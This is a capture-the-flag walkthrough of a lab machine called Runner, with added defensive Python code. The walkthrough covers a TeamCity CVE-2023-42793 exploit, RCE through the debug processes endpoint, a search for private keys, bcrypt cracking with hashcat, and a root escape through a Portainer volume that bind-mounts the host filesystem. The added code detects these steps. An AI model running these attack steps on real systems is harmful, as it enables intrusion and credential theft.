Enumeration
Scope
Ip Address 10.10.11.13
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -p22,80,8000 -sCV $ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
* Open ports: 22 - 80 - 8000
* UDP open ports: None
* Services: ssh - http - http-alt
CVE-2023-42793:
┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE1]
└─$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec7607:@H454NSec]
Initial Access
To get RCE, I had to generate a token from the webapp to be able to use it in the exploit.
Token
eyJ0eXAiOiAiVENWMiJ9.QVBTbmdKY1RkUHRyU1dxN0d6ekgySnVsQi1n.NWU4MDVlOGEtYzViOC00NDdkLWE5ZDktZDNhYjQyNjQxMGI0
Get RCE
┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE-2023-42793]
└─$ curl -X POST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H "Authorization: Bearer $(cat token.txt)" -H "Content-Type: text/plain"
StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
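The call above lands in the nginx access log in front of TeamCity, so a defender can alert on it. As an added example (not from the writeup), this parser reads combined-format log lines, picks out every request to the debug process-launch endpoint and separates the ones the server actually honoured; the log lines are constructed, and the combined format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# nginx "combined" access-log line (assumed: nginx fronts TeamCity, as on this box)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Debug endpoint that launches a process on the server; legitimate use is rare and admin-only
DEBUG_PROCESSES = "/app/rest/debug/processes"

# Constructed sample log: ordinary UI traffic plus the exePath=id call from the writeup
SAMPLE_LOG = """\
10.10.16.31 - - [04/Jul/2024:06:20:01 +0000] "GET /login.html HTTP/1.1" 200 4520 "-" "Mozilla/5.0"
10.10.16.31 - - [04/Jul/2024:06:21:10 +0000] "POST /app/rest/debug/processes?exePath=id HTTP/1.1" 200 61 "-" "curl/8.5.0"
10.10.16.31 - - [04/Jul/2024:06:22:42 +0000] "POST /app/rest/debug/processes?exePath=whoami HTTP/1.1" 200 58 "-" "curl/8.5.0"
10.10.16.31 - - [04/Jul/2024:06:23:05 +0000] "GET /app/rest/debug/processes HTTP/1.1" 403 120 "-" "Mozilla/5.0"
"""

def find_process_launches(log_text):
    """Return (ip, timestamp, method, exePath, status) for every hit on the debug process endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m.group("target"))
        if url.path != DEBUG_PROCESSES:
            continue
        exe = parse_qs(url.query).get("exePath", [""])[0]
        hits.append((m.group("ip"), m.group("ts"), m.group("method"), exe, int(m.group("status"))))
    return hits

def successful_launches(log_text):
    """Only the hits where the server answered 2xx, i.e. a process was actually started."""
    return [h for h in find_process_launches(log_text) if 200 <= h[4] < 300]
```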
I tried to search for files containing passwords, sensitive info or private keys and found one.
tcuser@647a82f29ca0:/$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa:1:-----BEGIN OPENSSH PRIVATE KEY-----
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
..snip..
-----END OPENSSH PRIVATE KEY-----
I'll try to log in over SSH as one of the existing users with the private key.
Success :)
john@runner:~$ cat user.txt
5b86f3875c0f223145xxxxxxxxxxxxxxxxxx
User flag: 5b86f3875c0f223145xxxxxxxxxxxxxxxxxx
Privilege Escalation
john@runner:~$ netstat -atnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5005 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9443 0.0.0.0:* LISTEN -
tcp 0 0 10.10.11.13:80 10.10.16.31:55852 ESTABLISHED -
tcp 0 0 127.0.0.1:8111 127.0.0.1:39674 TIME_WAIT -
I'll try to reach the internal ports with SSH local port forwarding.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ ssh -L 5005:localhost:5005 -L 9000:localhost:9000 -L 8111:localhost:8111 -L 9443:localhost:9443 john@$ip -i id_rsa
We got a web app
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ curl -I http://localhost:9000
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 19130
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 07 Dec 2023 08:15:07 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Thu, 04 Jul 2024 06:29:29 GMT
http://localhost:9000
I knew I had missed something, so I returned to the web app and found that I had forgotten to check the backup files and see what they contained.
tcuser@647a82f29ca0:/data/teamcity_server/datadir/backup/database_dump$ cat users
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, h454nsec7607, $2a$07$wpUET1qA8huRcRVWVeYXZ./XT43MJ0izESmdjKCZHawdKaSrp8oDq, , "", 1720071358142, BCRYPT
matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashid -m '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxx/JQsdGLulmeVo.Em'
Analyzing '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x
[+] bcrypt [Hashcat Mode: 3200]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6Kxxxxx/JQsdGLulmeVo.Em:pixxxx23
Session..........: hashcat
Status...........: Cracked
Log in to http://localhost:9000 with these credentials.
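Every row in the dump above is bcrypt with cost 07 (128 rounds), which is what makes the rockyou run cheap. As an added example (not from the writeup), here is a small audit of a users dump in that column layout that flags low cost factors and rows not stored as bcrypt; the rows and hashes are constructed, and the threshold of 10 follows OWASP's minimum work factor.

```python
import re

# bcrypt modular crypt format: $2a$<cost>$<22-char salt><31-char hash>
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")
MIN_COST = 10  # OWASP recommends a work factor of at least 10 (2**10 rounds)

def fake_bcrypt(cost):
    """Build a syntactically valid bcrypt string for the sample (constructed, not a real hash)."""
    return "$2a$%02d$" % cost + "A" * 22 + "B" * 31

# Constructed rows in the column layout of TeamCity's database_dump/users file
SAMPLE_USERS = "\n".join([
    "ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM",
    "1, admin, %s, John, john@runner.htb, 1720069876567, BCRYPT" % fake_bcrypt(12),
    "2, matthew, %s, Matthew, matthew@runner.htb, 1709150421438, BCRYPT" % fake_bcrypt(7),
    "3, svc, plaintext-oops, , \"\", 0, NONE",
])

def audit_users(dump_text):
    """Return (username, finding) for rows that are not bcrypt or use a cost below MIN_COST."""
    findings = []
    for row in dump_text.splitlines()[1:]:  # skip the header row
        cols = [c.strip() for c in row.split(",")]
        if len(cols) < 7:
            continue
        user, pw_hash, algo = cols[1], cols[2], cols[6]
        m = BCRYPT_RE.match(pw_hash)
        if algo != "BCRYPT" or not m:
            findings.append((user, "not bcrypt: algorithm=%s" % algo))
            continue
        cost = int(m.group(1))
        if cost < MIN_COST:
            findings.append((user, "weak bcrypt cost %d (minimum %d)" % (cost, MIN_COST)))
    return findings
```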
This article is very useful for understanding the container setup, but it was based on older versions of Portainer:
Following the post:
Get the image id
Try to map host file system to the container with the following settings
device: /
o: bind
type: none
Create a container with the settings below
Finally, Access the console and get root access :)
Root flag: e5072defc9d08b4320325b1e16a6b83f
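The volume options above (type: none, o: bind, device: /) are what turn a Portainer console into root on the host, and a plain `docker inspect` shows that mount only as a volume. As an added example (not part of the writeup), this audit reads `docker inspect` and `docker volume inspect` output and flags containers that reach a sensitive host path either through a direct bind mount or through a local volume whose driver options bind it; the JSON is constructed sample output, not data from the box.

```python
import json
# Host paths a container must never be able to mount; "/" covers the Portainer case on this box
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")

# Constructed `docker inspect <container>` output (sample, not from the box)
SAMPLE_CONTAINERS = json.dumps([
    {"Name": "/teamcity-server", "Mounts": [
        {"Type": "volume", "Name": "tc_data", "Source": "/var/lib/docker/volumes/tc_data/_data", "Destination": "/data"}]},
    {"Name": "/escape", "Mounts": [
        {"Type": "volume", "Name": "hostroot", "Source": "/var/lib/docker/volumes/hostroot/_data", "Destination": "/mnt/host"},
        {"Type": "bind", "Source": "/etc/nginx", "Destination": "/conf"}]},
])

# Constructed `docker volume inspect` output: the second volume is the "type: none, o: bind, device: /" trick
SAMPLE_VOLUMES = json.dumps([
    {"Name": "tc_data", "Driver": "local", "Options": None},
    {"Name": "hostroot", "Driver": "local", "Options": {"device": "/", "o": "bind", "type": "none"}},
])

def is_sensitive_source(path):
    """True if path is, or lies under, one of the sensitive host paths."""
    path = path.rstrip("/") or "/"
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")

def bind_backed_volumes(volumes_json):
    """Map volume name -> host device for local volumes whose options bind-mount a host path."""
    out = {}
    for vol in json.loads(volumes_json):
        opts = vol.get("Options") or {}
        if "bind" in opts.get("o", "").split(",") and opts.get("device"):
            out[vol["Name"]] = opts["device"]
    return out

def audit_containers(containers_json, volumes_json):
    """Return (container, destination, host_path) for every mount exposing a sensitive host path."""
    volumes = bind_backed_volumes(volumes_json)
    findings = []
    for c in json.loads(containers_json):
        for m in c.get("Mounts", []):
            # bind mounts expose Source directly; volume mounts may hide a bind in the driver options
            if m.get("Type") == "bind":
                host_path = m.get("Source", "")
            else:
                host_path = volumes.get(m.get("Name"), "")
            if host_path and is_sensitive_source(host_path):
                findings.append((c["Name"], m.get("Destination"), host_path))
    return findings
```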